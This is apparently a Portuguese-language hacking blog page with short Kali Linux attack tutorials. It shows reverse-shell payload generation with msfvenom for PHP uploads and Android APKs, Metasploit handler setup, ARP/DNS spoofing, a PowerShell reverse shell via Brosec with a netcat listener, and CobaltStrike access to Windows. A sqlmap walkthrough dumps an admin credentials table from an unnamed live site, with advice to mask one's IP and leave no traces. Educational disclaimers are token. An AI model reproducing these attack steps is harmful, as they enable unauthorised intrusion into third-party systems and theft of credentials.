Pentest

Pentest

Exclusivo para Pentest

Coletando Endereços de Email’s com Kali Linux

0

Boas Users!

Vou mostrar como coletar, endereços de email’s de um determinado domínio.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos usado:

# msfconsole

msfconsole= Framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

 

 

[ x ]
 

msf > use auxiliar/gather/search_email_collector

use auxiliar= Carregando o modulo email_collector

msf > set DOMAIN "domínio.com.br"

set DOMAIN= Selecionando o domínio

msn > run

run= Iniciando a coleta

 

 

Personalizando terminal “Kali Linux”

0

Boas Users!

Hoje vou ensinar, como personalizar o terminal do kali linux, muito simples.

 

Comandos Utilizados:

Antes de mais nada, entrar no diretório inicial do usuário:

# cd ~
# leafpad .user777

leafpad = editor de texto padrão do kali linux

.user777= nome do arquivo que escolhi, coloque o nome que achar melhor, mas não esquecendo do (.) ponto no inicio do arquivo, assim ele fica oculto no sistema.

# chmod +x

chmod= gerencia as permissões no linux

+x= Permissão de execução

# leafpad .bashrc

.bashrc= Arquivo do terminal

# cat ~/.user777

cat= lista um arquivo na tela

~= diretório inicial do usuário

Links dos geradores:

http://patorjk.com/software/taag/#p=d

http://joshua.einhyrning.com/wtfig/

 

By user777

 

 

 

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

Sql Injection com sqlmap – Fácil, Rápido e Perigoso!

2

 

Amigos, boa semana a todos.

Estarei postando algumas informações sobre o SQLMAP, forma de uso e um teste pratico com a ferramenta.

Antes de tudo, É preciso saber que não nos responsabilizamos por quaisquer danos causados a terceiros enquanto usando essa e outras ferramentas apresentadas no site.

O sqlmap tem a finalidade de facilitar as injeções de sql, assim trazendo ao processo de “sql injection” uma facilidade quando no ato de testes.

Existem diversas formas de proceder esses testes, uma delas é fazer o processo manualmente diretamente na barra de URL no destino (lik do site) . Já o sqlmap tem a proposta de facilitar todo o processo, automatizando os comandos, testes e até buscando por possíveis passwords se utilizado os programas corretos.

1 – Apresentação, Site Oficial e Testes –

A apresentação do SqlMap é feita diretamente no seu man page, para isso podemos usar o comando:
man sqlmap

Teremos como saída um resultado similar a este abaixo:

O site oficial do sqlmap pode ser consultado no seguinte endereço : http://sqlmap.org/

Os teste a seguir foram executados com cautela para que não ficassem expostos os dados da maquina realizadora dos ataques. Assim, sugiro a todos que busquem antes de executar testes façam o devido mascaramento de seus endereços Ips.

O Alvo usado foi um site localizado a partir de um script qual tem a função especifica de buscar as falhas, me dando o resultado dos sites vulneráveis ao sqlinjection.

O Ataque:

Inicialmente vou guardar o link do site que vou atacar em uma Variável, assim facilitará para mim realizar o procedimento sem ter que ficar diversas vezes digitando o endereço onde a referência de vulnerabilidade foi encontrada.

Ex : http://site.com/php?=id55487

Então, façamos o seguinte passo:

root@love:/#URLSQL=www.site.com/php?=id55487

E iniciamos o nosso Scan usando a Variavel onde está armazenada o endereço URL.

root@love:/# sqlmap -u $URLSQL –dbs

Vejam na imagem abaixo, após rodar o sqlmap que já é possível determinar as databases do site, isso porque a flag < –dbs > ao final do link diz ao programa para listar as databases, claro isso se o site oferecer a vulnerabilidade para o escaneamento.


Após termos a lista de databases (banco de dados) do nosso alvo, então é hora de testarmos a database escolhida, pedindo ao sqlmap para exibir as tabelas do banco, para isso é necessário usar o conjuto de  flags < -D <database> –table >.

De certa forma, podemos eventualmente alcançar alguns erros, mas nada que nos impeça de tentar novamente,até conseguirmos algo. Como neste caso não houve erro, prossigo…

root@love:/# sqlmap -u $URLSQL -D dbserver3 –tables

Logo que este passo for concluido, teremos as seguintes informações: Tabelas do banco de dados solicitado acima. EX:



Agora , cabe a nós continuarmos, e especificar qual tabela ou tabelas desejamos obter informações , para tal basta continuarmos o teste especificando a tabela qual obteremos uma ou mais colunas.

root@love:/# sqlmap -u $URLSQL -D dbserver3 -T admin_user –columns
Logo obteremos os seguintes dados:

Agora só nos resta definir quais colunas queremos um “dump”, quais vamos buscar os dados, assim então rodamos o sqlmap da seguinte forma:
root@love:/# sqlmap -u $URLSQL -D dbserver3 -T admin_user -C admin_email,admin_pass,_admin_username –dump

Veja que usamos o “-C” para especificar as colunas desejadas e o “–dump” para obtermos as informações das colunas listadas.

Durante o scan o sqlmap nos dá a opção de crackear informações com um ataque de dicionário, no caso eu optei por não fazê-lo.

E teremos esse resultado:


Bom, logicamente ainda falta muito para se chegar a “invadir” este site, mas a proposta desse tópico foi referenciar a facilidade para se chegar a senhas e informações de um site que esteja vulnerável a este tipo de ataque.

Eu recomendo a todos que caso façam os testes se privem a somente testar, que não entrem em sites desconhecidos a menos que você tenha o conhecimento específico para não ser encontrado ou não deixar rastros. No mais fica mais essa dica e que todos possam usá-la como fonte de estudo somente.

Invadindo com Power Shell kali Linux

0

Boas Users!

Vou demonstrar mais uma vulnerabilidade “sistemas Windows”

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Comandos Utilizados:

# apt-get install npm build-essential g++ xsel
# npm install -g n
# npm config set registry http://registry.npmjs.org/
# n latest
# git clone https://github.com/gabemarshall/Brosec.git

git clone = Faz o download do Brosec

# cd Brosec && npm install

cd Brosec && npm install = Entra no diretório Brosec e instala p npm

# ./bros

./bros = Iniciando o script

# set LHOST (seu IP)

LHOST = IP do atacante

# set LPORT 4444

LPORT = Porta utilizada

# 5

5 = Miscellaneos que significa “Variado”

# 1

1 = Reverse shell

# 4

4 = Reverse Shell PSH

# N

N = “Não” “Should I start a tcp listener on port for you”

# netcat -lnp 4444 -vv

Iniciando o serviço

 

Fonte: https://github.com/gabemarshall/Brosec

 

By user777

 

 

 

 

Criando Servidor IRC no Kali Linux “InspiRCD”

0

Boas Users!

Vamos instalar o InspIRCd no kali

1- Basta abrir o terminal e inserir o seguinte comando;

#apt-get install inspircd

2-  Agora à configuração. Para tal vamos abrir o ficheiro /etc/inspircd/inspircd.conf onde devem realizar as seguintes configurações:

OBS: usarei o editor de texto “vi”, você poderá usar o editor de texto de seu gosto.

#vi /etc/inspircd/inspircd.conf

Ao nível do servidor, devem alterar os seguintes dados:

Server name
Description
Network

Configure de acordo com suas informações.

Captura de tela de 2016-07-21 00-25-10
3- Ao nível da administração,  devem  alterar os seguintes dados de acordo com a conta que pretendam criar.
Admin
Nick
Email
Captura de tela de 2016-07-21 00-25-30
4- Em termos de servidor, devem também indicar a partir de qual endereço é que o mesmo está disponível. No exemplo da imagem seguinte, consideramos o endereço 177.154.11.100 e porta 6667.
Captura de tela de 2016-07-21 00-25-50
5- O próximo passo é definir uma password  necessária para parar ou reiniciar o serviço.
Captura de tela de 2016-07-21 00-26-19
6- Vamos agora criar um conta de operador. Para tal basta procurarem pela linha que começa por <oper name=…, dentro do ficheiro de configuração.
Captura de tela de 2016-07-21 00-26-46
7- salve o arquivo e iniciei o serviço usando o comando
#service inspircd start

Estas são as configurações mínimas para que o InspIRCd funcione. No entanto há muitos outros parâmetros que podem ser consultados aqui.

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777